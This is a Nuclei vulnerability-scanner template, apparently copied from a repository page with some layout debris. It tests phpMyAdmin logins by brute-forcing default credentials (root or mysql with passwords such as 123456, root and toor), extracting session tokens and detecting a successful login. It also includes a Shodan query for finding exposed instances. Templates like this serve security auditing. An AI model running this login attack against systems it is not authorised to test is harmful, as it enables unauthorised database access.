74 lines
1.7 KiB
YAML
74 lines
1.7 KiB
YAML
id: phpmyadmin-default-login
|
|
|
|
info:
|
|
name: phpMyAdmin Default Login
|
|
author: Natto97
|
|
severity: high
|
|
description: phpMyAdmin default admin credentials were discovered
|
|
reference:
|
|
- https://www.phpmyadmin.net
|
|
metadata:
|
|
verified: true
|
|
shodan-query: http.title:phpMyAdmin
|
|
tags: default-login,phpmyadmin
|
|
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /index.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /index.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Cookie: phpMyAdmin={{token2}}; pma_lang=en
|
|
|
|
set_session={{session}}&pma_username={{user}}&pma_password={{password}}&server=1&route=%2F&token={{token}}
|
|
|
|
attack: clusterbomb
|
|
payloads:
|
|
user:
|
|
- root
|
|
- mysql
|
|
password:
|
|
- 123456
|
|
- root
|
|
- mysql
|
|
- toor
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: token
|
|
internal: true
|
|
group: 1
|
|
regex:
|
|
- 'name="token" value="([0-9a-z]+)"'
|
|
|
|
- type: regex
|
|
name: token2
|
|
internal: true
|
|
group: 1
|
|
regex:
|
|
- 'name="set_session" value="([0-9a-z]+)"'
|
|
|
|
- type: regex
|
|
name: session
|
|
part: header
|
|
internal: true
|
|
group: 1
|
|
regex:
|
|
- "phpMyAdmin=([0-9a-z]+)"
|
|
|
|
req-condition: true
|
|
stop-at-first-match: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- contains(all_headers_2, "phpMyAdmin=") && contains(all_headers_2, "pmaUser-1=")
|
|
- status_code_2 == 302
|
|
- contains(all_headers_2, 'index.php?collation_connection=utf8mb4_unicode_ci') || contains(all_headers_2, '/index.php?route=/&route=%2F')
|
|
condition: and
|